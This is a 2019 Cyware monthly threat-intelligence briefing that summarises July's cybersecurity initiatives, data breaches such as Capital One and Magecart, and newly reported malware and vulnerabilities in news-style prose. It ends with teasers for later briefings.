Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Monthly Threat Intelligence

Cyware Monthly Threat Intelligence - Featured Image

Monthly Threat Briefing Aug 1, 2019

**The Good **

As July comes to an end, let’s quickly recap all that happened in the cybersecurity world this month. July witnessed several cybersecurity advancements, security incidents, as well as the emergence of new threats. To begin with, let’s first glance through all the good that has happened in the cyberspace. The National Security Agency (NSA) plans to establish a new cybersecurity division that will help defend the US against foreign cyber-threats. The U.S. government announced plans to implement new DNS security measures for all .gov domains. Meanwhile, Samsung Electronics, South Korean telcos, and banks formed a consortium to build a blockchain network to deploy mobile authentication services.

  • The U.S. government announced plans to implement new DNS security measures for all .gov domains to mitigate risks associated with future DNS hijacking attacks. This new initiative was prompted by a global DNS hijacking campaign alert issued by the National Cybersecurity and Communications Integration Center (NCCIC).

  • The National Security Agency (NSA) plans to establish a new cybersecurity division named ‘Cybersecurity Directorate’ that will help the US defend against foreign cyber-threats. This new division will enable organizations to share information with their customers so they are equipped to defend against cyber threats. The directorate will become operational on October 01, 2019.

  • Toyota released an open-source testing tool named ‘PASTA’ (Portable Automotive Security Testbed) that tests a car’s vulnerability to hacking. This testing tool can be used by car manufacturers for their own research and development. PASTA is designed to simulate attacks and test for vulnerabilities and exploits, but not for hacking the vehicle while it is moving.

  • Fujitsu Laboratories announced the development of a digital identity exchange technology that uses blockchain to enhance trust while validating a user. This technology enables individual users and service businesses involved in online transactions to confirm the identity of the other parties. The technology is developed based on Decentralized Identification (DID) system.

  • Samsung Electronics, South Korean telcos, and banks formed a consortium to build a blockchain network to deploy mobile authentication services. The organizations part of the consortium are SK Telecom, KT, LG Uplus, KEB Hana Bank, and Woori Bank.

The Bad

This month witnessed numerous data breaches and cyber attacks that saw the exposure of millions of people's personal information across the globe. Capital One suffered a massive data breach exposing the personal and credit card information of almost 106 million US and Canadian customers. Meanwhile, Magecart attackers were spotted in two different massive attack campaigns. First was the large-scale campaign that breached almost 962 e-commerce stores in just 24 hours. The second campaign witnessed Magecart attackers injecting card skimmer code on over 17,000 websites through misconfigured Amazon S3 buckets.

  • Capital One suffered a major data breach after a hacker exploited a configuration vulnerability in the web application firewall. This exposed the personal and credit card information of almost 100 million people in the United States and around 6 million people in Canada. The exposed information includes personal information, credit card data, transaction data, Social Security numbers, linked bank account numbers, and Social Insurance numbers of consumers and small businesses who applied for credit card products between 2005 and 2019.

  • Attackers hacked 7-Eleven Japan’s 7pay customer accounts and made illegal charges on almost 900 customers incurring a collective loss of ¥55 million ($510,000). The incident was caused by a security lapse in the design of the company's mobile payment app 7pay which was launched on July 1, 2019.

  • The Administrative Office of Courts in the state of Georgia was hit by a ransomware attack that resulted in its servers being taken offline. The court agency also had its website shut down due to the attack. However, websites for Georgia Supreme Court and court clerks remained operational.

  • An unprotected MongoDB database exposed almost 188 million records of personal data sourced from Pipl and LexisNexis. Almost 800,000 records originated from LexisNexis which included names, addresses, gender, parental status, a short biography, family members, redacted emails, and information about the individual’s neighbors including full names, dates of birth, reputation scores, and addresses.

  • Attackers breached the Internet Domain Registry of ICS-Forth impacting several .gr and .el domain owners whose domain names were stored in the compromised registry. Researchers identified that a hacker group known as Sea Turtle were responsible for the attack against ICS-Forth.

  • Magecart attackers injected card skimming code on over 17000 domains with malicious JavaScript files through misconfigured Amazon S3 buckets. Some of the affected websites are also listed in Alexa’s top 2000 rankings. Researchers suggest that threat actors behind this campaign scanned for misconfigured Amazon S3 buckets as well as JavaScript files. After finding these files, they downloaded them and appended the card-skimming code.

  • A large-scale Magecart campaign breached almost 962 e-commerce stores in a span of 24 hours, stealing customers’ payment card details including full credit card data, names, phone numbers, and addresses. The attackers inserted a customized Javascript on e-commerce sites, essentially inserting a fake credit card payment section.

  • The GitHub account of Canonical, the company behind Ubuntu was compromised by hackers. In addition, they created 11 new GitHub repositories in the official Canonical account. However, the organization confirmed that there was no evidence that any source code or sensitive information was impacted.

  • Hackers stole almost 110 databases containing the private data of millions of Bulgarians from the NRA network and leaked 57 databases to local news publications via emails containing download links. The leaked information contained personal identification numbers (PINs), names, home addresses and financial earnings of Bulgarians. Most of the information available in the databases dated back as far as 2007.

  • An international investigation revealed that the Chinese authorities are installing surveillance apps on the phones of some visitors at border crossings in the Xinjiang region as part of the government's mass surveillance program. The malicious surveillance app installed on visitors’ phones can extract emails, text messages, phone logs, contact information, calendar entries, and device information. The app can also scan the device for over 70,000 different files.

  • A database dump added to Have I Been Pwned website had contained data of almost 101 million Evite users who had their information exposed in a data breach earlier this year. At that time, it was believed that approximately 10 million users had their information exposed, however, the number of exposed users is much larger.

  • Hackers gained unauthorized access to Sprint customer accounts using their account credentials via a Samsung website. The compromised information includes customers’ names, phone numbers, billing addresses, device types, device IDs, monthly recurring charges, subscriber IDs, account numbers, account creation dates, upgrade eligibility, and add-on services.

  • An unsecured database belonging to YouHodler exposed over 86 million records of user data including names, dates of birth, email addresses, addresses, phone numbers, passport numbers, passwords, credit card numbers, CVV numbers, bank details, and crypto wallet addresses. YouHodler acknowledged the data leak and secured the database by restricting public access.

  • Security researchers from Data Group discovered an unprotected server containing 250GB of data which was publicly accessible without any authentication. The unsecured server contained sensitive information of clients of various local banks. Even though the server is linked to more than one bank, a majority of the exposed details were related to a local bank named Banco Pan.

  • A Chinese cyberespionage group targeted several German firms including BASF, Seimens, and Hankel with Winnti malware. Apart from these German firms, Roche, Marriott, Lion Air, Sumitomo Corporation, and Shin-Etsu Chemical were also targeted by the group.

  • A hacker group named ‘0v1ru$’ breached SyTech, a contractor for the Russian Federal Security Service (FSB) and stole information about internal projects. The contractor had worked for FSB unit 71330 and with fellow contractor Quantum since 2009. The projects include Nautilus, Nautilus-S, Reward, Mentor, Hope, and Tax-3.

  • The LaPorte County in Indiana suffered a malware attack that disabled the county’s computer systems and email services. The county reported the matter to FBI and informed other law enforcement agencies about the attack. It is working with security experts to respond to such cyber attacks. The experts will also coordinate with the county to repair the affected systems and improve the security to prevent such virus infection.

  • A misconfigured Elasticsearch cluster owned by the Public Security Department of Jiangsu Province, China, leaked two databases containing over 90 million citizen and business records. The leaky databases contained 58,364,777 public records and 33,708,010 business records. Public information includes names, dates of birth, genders, identity card numbers, location coordinates, as well as city information. The business records included business IDs, business types, location coordinates, city_open_id, and memos designed to track the owner of the business.

New Threats

Several new malware, ransomware, vulnerabilities, and threat groups emerged this month. Trickbot trojan added a custom proxy module from IcedID. A malspam campaign that delivers Astaroth malware through fileless execution was spotted in the wild. Meanwhile, WhatsApp and Telegram were found to be impacted by a new flaw named ‘Media File Jacking’.

  • The Trickbot trojan was found deploying a custom proxy module from Bokbot, also known as IcedID. This module is derived from IcedID’s code for web injection attacks. This new Trickbot module is dropped separately as “shadnewDll” and comes with its own configuration file. This module acts as a local proxy server between the client and the online banking service and can include a fake template for the bank requested by the user in order to steal sensitive information.
  • Researchers uncovered a string of malware campaigns that leveraged the ‘Heaven’s Gate’ technique for evasion. The technique allowed malware developed in 32-bit to hide API calls in 64-bit machines. According to the researchers, one of the campaigns distributed the HawkEye Reborn keylogger. Other campaigns mainly distributed Remcos, Agent Tesla, or cryptocurrency mining trojans.
  • US Cyber Command issued an alert on Twitter about the exploitation of a known vulnerability in Microsoft Outlook. Tracked as CVE-2017-11774, the vulnerability is being exploited by threat actors to deploy malware on government networks. The vulnerability was patched in the October 2017 Patch Tuesday updates.
  • New research revealed that WhatsApp and Telegram are impacted by a new flaw named ‘Media File Jacking’. The vulnerability arises from how media files are stored on these messaging apps. It could allow attackers to manipulate and expose WhatsApp and Telegram media files.
  • WannaLocker, a mobile derivative of WannaCry ransomware has been enhanced with spyware, RAT, and banking trojan capabilities. Cybercriminals have been found using this all-in-one malware to target Brazilian banks and their customers.
  • A new campaign that delivers Astaroth malware through fileless execution was spotted by Microsoft Defender ATP team. It was found that the campaign ran Astaroth directly in memory. The attackers relied on spear-phishing to spread this malware. Furthermore, they leveraged the Windows Management Instrumentation Command-line (WMIC) tool to run scripts for fileless execution.
  • Anubis banking trojan which targets Android mobile users was back in a new campaign. Researchers detected two servers containing 17,490 samples of Anubis trojans. These samples of Anubis are called AndroidOS_AnubisDropper. The two samples of Anubis trojan are labeled as ‘Operatör Güncellemesi’ and ‘Google Services.
  • Researchers uncovered a new malspam campaign that delivers Dridex banking trojan and RMS RAT via malicious Microsoft Word document attachments. The phishing emails included malicious ZIP archives containing XLS (Microsoft Excel) documents disguised as fake eFax messages. The malicious documents were embedded with a macro which is designed to download and launch the Dridex trojan and RMS RAT. Upon execution, the Dridex trojan collects credentials from the web browsers and the RMS RAT manages the infected systems.
  • Turla APT group was spotted using a new malware dubbed ‘Topinambour’ in its recent campaign. Topinambour uploads and executes malicious files on compromised machines, along with fingerprinting them. The APT group used installers of legitimate software such as Softether VPN, psiphon3, or Microsoft Office ‘activators’ to spread Topinambour.
  • The developers of GandCrab are believed to be behind the Sodinokibi ransomware. In May, the group had announced their retirement from using GandCrab RaaS. On the other hand, the FBI released a master decryption key to unlock files encrypted by any versions (from 4 to 5.2) of GandCrab.
  • Researchers uncovered a vulnerability in the Facebook-owned social networking app Instagram. The vulnerability resided in the ‘password recovery’ feature of the mobile version of Instagram. It could allow attackers to reset the passwords for any Instagram account and take complete control of it.
  • Researchers analyzed a sample of the MegaCortex ransomware that targets enterprises. The attackers behind the ransomware operated by accessing a target network and then compromising the Windows domain controller. After encrypting compromised workstations, the ransomware demands a ransom that falls somewhere between 2-3 bitcoins to 600 BTC.

Related Threat Briefings

Feb 10, 2025

Cyware Monthly Threat Intelligence, January 2025

The U.K took a proactive stance on cyber resilience with its Cyber Local initiative, injecting £1.9 million into 30 projects across England and Northern Ireland. The effort focuses on closing the cyber skills gap, fortifying small businesses, and supporting underrepresented groups. India tightened its grip on data privacy with new draft rules designed to give citizens more control over their personal information. The proposed regulations mandate clearer data processing disclosures, stricter security protocols, and swift breach reporting. Hackers turned to SparkRAT, an open-source GoLang RAT, to target macOS users and government entities. Initially released in 2022, its modular design and cross-platform capability have made it a cybercriminal favorite. More than 10,000 WordPress sites were hijacked in a large-scale malware campaign delivering AMOS to macOS users and SocGholish to Windows users. Attackers exploited outdated plugins to inject fake browser update prompts. Lumma Stealer is made its way through GitHub in a new malware campaign that abuses the platform’s release infrastructure. Attackers deployed malware like SectopRAT and Vidar, using secure-looking download links to exfiltrate data while evading detection. Cybercriminals deployed the Coyote banking trojan against financial firms in Brazil, using malicious Windows LNK files to execute PowerShell scripts. This malware established secure connections with C2 servers, enabling keylogging and data theft. A two-year-long phishing campaign targeted Microsoft’s advertising platform users through malicious Google Search ads. A Mirai-based botnet exploited zero-day vulnerabilities in industrial routers and smart home devices. With 15,000 active nodes daily, it launched high-intensity DDoS attacks surpassing 100 Gbps, posing a growing threat across multiple countries.

Jan 3, 2025

Cyware Monthly Threat Intelligence, December 2024

The cloud revolution isn’t just about convenience anymore; it’s now the frontline of defense. With CISA's new directive mandating cloud environment fortification, federal agencies face a race against time to safeguard Microsoft 365 and other services. Meanwhile, proposed updates to the HIPAA security rules push healthcare organizations toward stronger PHI protection with advanced technical controls and detailed incident planning. On the global front, Operation PowerOFF turned the tables on DDoS attackers, dismantling 27 illegal platforms and curbing festive-season chaos. The cyber battlefield sees no intermission as new threats take center stage. A phishing campaign, dubbed Aggressive Inventory Zombies (AIZ), exploited brand trust by mimicking retail giants and crypto platforms. Meanwhile, the resurrected BADBOX botnet has compromised 192,000 Android devices globally, sneaking into supply chains to wreak havoc with ad fraud and account abuse. Adding to the turbulence, Poison Ivy (APT-C-01) resurged, targeting critical sectors with advanced phishing techniques and deploying Sliver RAT to breach systems and steal sensitive data. This month, new threats targeted IoT, banking, and app ecosystems, with threat actors unleashing diverse attacks. Iranian hackers deployed IOCONTROL malware to compromise IoT and OT systems, targeting critical infrastructure like gas stations. Meanwhile, the DroidBot banking malware infiltrates cryptocurrency and banking apps across Europe, leveraging MaaS operations for tailored attacks. Adding to the chaos, SpyLoan malware apps, with over eight million installs, exploited users in South America, Southeast Asia, and Africa, highlighting the escalating risks within app marketplaces. For detailed Cyber Threat Intel, click ‘Read More’.

Dec 4, 2024

Cyware Monthly Threat Intelligence, November 2024

The TSA reshaped the cybersecurity landscape for pipeline and railroad operators with proposed rules mandating incident reporting and risk management plans. Estimated to cost $2.1 billion over the next decade, the rules aimed to address growing cyber threats while balancing flexibility with resilience. Meta dismantled a sprawling web of over two million accounts tied to pig butchering scams in Southeast Asia and the UAE. Africa’s cybercrime ecosystem faced a decisive blow with Operation Serengeti, as over 1,000 suspects were arrested, and 134,000 malicious networks taken offline. TAG-110, a Russia-aligned threat group, launched a cyber-espionage campaign targeting governments and organizations in Asia and Europe. Using malware like HATVIBE and CHERRYSPY, it aimed to monitor geopolitical developments and assert influence. A botnet powered by Ngioweb malware converted 35,000 IoT devices into residential proxies. These compromised devices, found largely in the U.S., were sold on platforms like NSOCKS for malicious purposes. Water Barghest compromised over 20,000 IoT devices by exploiting known vulnerabilities. The group used Shodan to identify targets and deployed Ngioweb malware to connect them to its monetized network. LIMINAL PANDA, a Chinese cyberespionage group, has been targeting telecoms in South Asia and Africa since 2020. Using tools like SIGTRANslator and PingPong, the group exploits telecom protocols to steal critical data while staying undetected. NodeStealer has resurfaced, targeting Facebook Ads Manager accounts to steal credit card details and browser credentials. It uses Windows Restart Manager and Python scripts to execute its attacks, with stolen data sent via Telegram. BabbleLoader, a stealthy malware loader, delivers WhiteSnake and Meduza stealers. Disguised as accounting software, it targets English and Russian speakers, evading antivirus systems with advanced techniques.

Sep 30, 2024

Cyware Monthly Threat Intelligence

The Good The government took significant steps to strengthen cybersecurity resilience across various sectors. The DHS allocated $279.9 million in grants for the FY 2024 State and Local Cybersecurity Grant Program (SLCGP) to help state, local, and t

Sep 2, 2024

Cyware Monthly Threat Intelligence

The Good In a series of proactive measures aimed at bolstering global cybersecurity resilience, significant strides were made in the education and law enforcement sectors to safeguard critical systems against evolving threats. The NASA Katherine Jo

Aug 1, 2024

Cyware Monthly Threat Intelligence

The Good The collaborative efforts and enhanced protocols by different government bodies represent significant steps forward in strengthening cybersecurity on a global scale. French authorities, in collaboration with Europol, have launched a "disin

Jul 1, 2024

Cyware Monthly Threat Intelligence

The Good Recent developments showcase a proactive stance in bolstering cybersecurity across critical sectors. The collaboration between the U.K’s National Crime Agency (NCA) and the FBI to dismantle the Qilin ransomware gang highlights internationa

Jun 3, 2024

Cyware Monthly Threat Intelligence

The Good In recent AI developments, NIST, OpenAI, and government bodies are taking significant steps to ensure the responsible use of AI technologies. NIST's new ARIA program aims to ensure AI technologies are valid, reliable, safe, secure, private

May 3, 2024

Cyware Monthly Threat Intelligence

The Good In a major stride towards security with AI, the Five Eyes agencies released a cybersecurity guide to help organizations secure AI system deployments. Separately, heightened attacks on mobile networks made the GSM Association unveil the MoT

Apr 11, 2024

Cyware Monthly Threat Intelligence

The Good Revolutionizing cybersecurity with innovative and adaptive measures, the Pentagon unveiled the first-ever strategy to protect the defense industrial base from cyber threats, emphasizing resilience and cooperation to defend critical infrast

Mar 4, 2024

Cyware Monthly Threat Intelligence

The Good In a move towards enhancing quantum computing security, the Linux Foundation revealed an initiative in collaboration with major global technology corporations. The past month marks a step forward in file-type detection tooling as Google op

Feb 1, 2024

Cyware Monthly Threat Intelligence

The Good With cloud environments facing an ongoing battle against complex cyber threats, the NCSC stepped in to help SMBs enhance cloud service security. Account takeovers are the ultimate impersonation tactic and pose a significant threat. To tack